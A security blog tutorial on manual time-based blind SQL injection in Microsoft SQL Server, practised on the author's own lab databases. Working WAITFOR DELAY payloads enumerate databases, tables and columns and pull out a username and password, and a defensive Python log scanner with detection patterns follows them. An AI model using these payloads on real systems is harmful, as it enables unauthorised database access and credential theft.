Time-based blind injection in Microsoft SQL Server: hands-on notes

saulGoodman

Offensive and defensive security research, focused on red teaming



Overview of time-based injection

The delay statement: WAITFOR DELAY

WAITFOR is a flow-control statement provided by Transact-SQL in SQL Server. It waits for a specified amount of time and then continues executing the statements that follow. It takes the argument DELAY, which specifies how long to wait.

If the injected statement executes successfully, the database, and therefore the web request, returns its response only after the specified delay. Because the condition in the statement does not depend on the content of the page, it is easy to tell whether the injection succeeded. By observing whether the web request is delayed, a penetration tester can determine whether an injection vulnerability exists on a website. And because the statement returns no specific content, it is also an important way to detect blind injection.

Syntax:

WAITFOR DELAY '0:0:n'

Example:

WAITFOR DELAY '0:0:4' --  delays for 4 seconds

IF EXISTS () clause

Syntax:

IF exists () WAITFOR DELAY '0:0:5'

Manual time-based injection

1. Determine whether an injection point exists

WAITFOR DELAY '0:0:4'

2. Guess the database name

Guess whether a database exists

if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--

This statement checks whether the database with the dbid given in the where clause exists. If it does, the response is delayed by 3 seconds.

Guess the database name by dbid; first guess its length

if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--

Because I only created two databases: test (dbid 5) and saulgoodman (dbid 6)

So I can use the statement above to test whether the name of the database with dbid 5 has the length given in len(name); if it does, the response is delayed by 3 seconds.

Similarly, to guess the length of the name of dbid 6 (saulgoodman) use this statement:

if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--

If you have more databases, the statement works the same way.

Query the database name character by character, by dbid

Because we know the database at this dbid is test, we can guess its name one character at a time:

Guess character 1 (t):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
Guess character 2 (e):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
Guess character 3 (s):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
Guess character 4 (t):

To query the dbid 6 database, saulgoodman, we just change the dbid number:

Guess character 1 (s):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
Guess character 2 (a):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
Guess character 3 (u):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
Guess character 4 (l):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
Guess character 5 (g):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
Guess character 6 (o):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
Guess character 7 (o):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
Guess character 8 (d):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
Guess character 9 (m):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
Guess character 10 (a):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
Guess character 11 (n):
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--

3. Guess the table name

Because we know the database name test, we can use the following statement to test whether the length of the first table name equals 5 (the table name is users):

if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--

The figure shows the response the page returned, confirming that the table name length is 5; we can then guess its characters one by one (users):

Guess character 1 (u):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
Guess character 2 (s):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
Guess character 3 (e):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
Guess character 4 (r):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
Guess character 5 (s):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--

Because we know the database name is test and the first table name is users, we can use the following statements to query the characters of the second table name (the table name is info):

Guess character 1 (i):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
Guess character 2 (n):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
Guess character 3 (f):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
Guess character 4 (o):
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--

4. Guess the column name

Because we know the table name users, we can guess the column names in the users table (the column name is username):

Guess character 1 (u):
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
Guess character 2 (s):
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
Guess character 3 (e):
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
Guess character 4 (r):
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
Guess character 5 (n):
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
Guess character 6 (a):
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
Guess character 7 (m):
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
Guess character 8 (e):
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--

This guesses out the first column name: username!

The second way: we have four columns, id, username, password and age

(Get the first column name: id)

Get character 1 (i):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
Get character 2 (d):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--

Get the second column name (username):

Get character 1 (u):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
Get character 2 (s):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
Get character 3 (e):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
Get character 4 (r):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
Get character 5 (n):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
Get character 6 (a):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
Get character 7 (m):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
Get character 8 (e):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--

Get the third column name (password):

Get character 1 (p):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
Get character 2 (a):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
Get character 3 (s):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
Get character 4 (s):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
Get character 5 (w):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
Get character 6 (o):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
Get character 7 (r):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
Get character 8 (d):
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--

Guessing the data character by character

We know the table name users and the column names username and password, so we start extracting the data (saul):

Test character 1 of the username column (s):
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
Test character 2 of the username column (a):
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
Test character 3 of the username column (u):
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
Test character 4 of the username column (l):
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--

This gives the first username: saul

Get saul's password (the password is saul520):

Test character 1 of the password column (s):
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
Test character 2 of the password column (a):
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
Test character 3 of the password column (u):
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
Test character 4 of the password column (l):
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
Test character 5 of the password column (5):
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
Test character 6 of the password column (2):
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
Test character 7 of the password column (0):
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--

That concludes these notes on manual time-based blind injection in MSSQL.
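As an added, defender-side example (not from the original post): a small Python scanner that URL-decodes request targets from a web server log, flags the payload shapes walked through above (WAITFOR DELAY, the ascii/unicode(substring(...)) character oracle, the sysdatabases/sysobjects/syscolumns catalog views) and correlates each hit with the measured response time, since a WAITFOR payload whose request also took at least the requested delay is strong evidence the statement actually ran. The log format (METHOD TARGET STATUS RESPONSE_MS), the sample lines and the function names normalise, classify and analyse are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the original post).
# Assumed format: METHOD TARGET STATUS RESPONSE_TIME_MS
SAMPLE_LOG = """\
GET /item.asp?id=5 200 23
GET /item.asp?id=5%20waitfor%20delay%20'0:0:4'-- 200 4031
GET /item.asp?id=5%20if%20(ascii(substring((select%20top%201%20name%20from%20master.dbo.sysdatabases%20where%20dbid%3D5),1,1))%20%3D%20116)%20WAITFOR%20DELAY%20'0:0:3'-- 200 3019
GET /item.asp?id=7 200 19
GET /search.asp?q=delay+in+shipping 200 31
"""

# Signatures derived from the payload shapes used in the post above.
SIGNATURES = [
    ("waitfor_delay", re.compile(r"\bwaitfor\s+delay\b")),
    ("char_oracle", re.compile(r"\b(?:ascii|unicode)\s*\(\s*substring\s*\(")),
    ("sys_catalog", re.compile(r"\b(?:sysdatabases|sysobjects|syscolumns)\b")),
]

LOG_RE = re.compile(r"^(?P<method>\S+) (?P<target>\S+) (?P<status>\d{3}) (?P<ms>\d+)$")

def normalise(target: str) -> str:
    """Percent-decode the target twice (catches double encoding) and lower-case it."""
    return unquote_plus(unquote_plus(target)).lower()

def classify(target: str, ms: int, slow_ms: int = 2500):
    """Return (matched signature names, whether the response was slower than slow_ms)."""
    text = normalise(target)
    hits = [name for name, rx in SIGNATURES if rx.search(text)]
    return hits, ms >= slow_ms

def analyse(log_text: str, slow_ms: int = 2500):
    """Report every request matching a signature; 'slow' hits are the ones to page on."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # lines outside the assumed format are skipped
        hits, slow = classify(m["target"], int(m["ms"]), slow_ms)
        if hits:
            findings.append({"line": lineno, "signatures": hits, "slow": slow})
    return findings
```

Running analyse(SAMPLE_LOG) reports lines 2 and 3 of the constructed log, both marked slow because their response times reached the delays their payloads requested; the benign "delay in shipping" search is not reported.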


Source: blog.csdn.net/weixin_46245322/article/details/105213372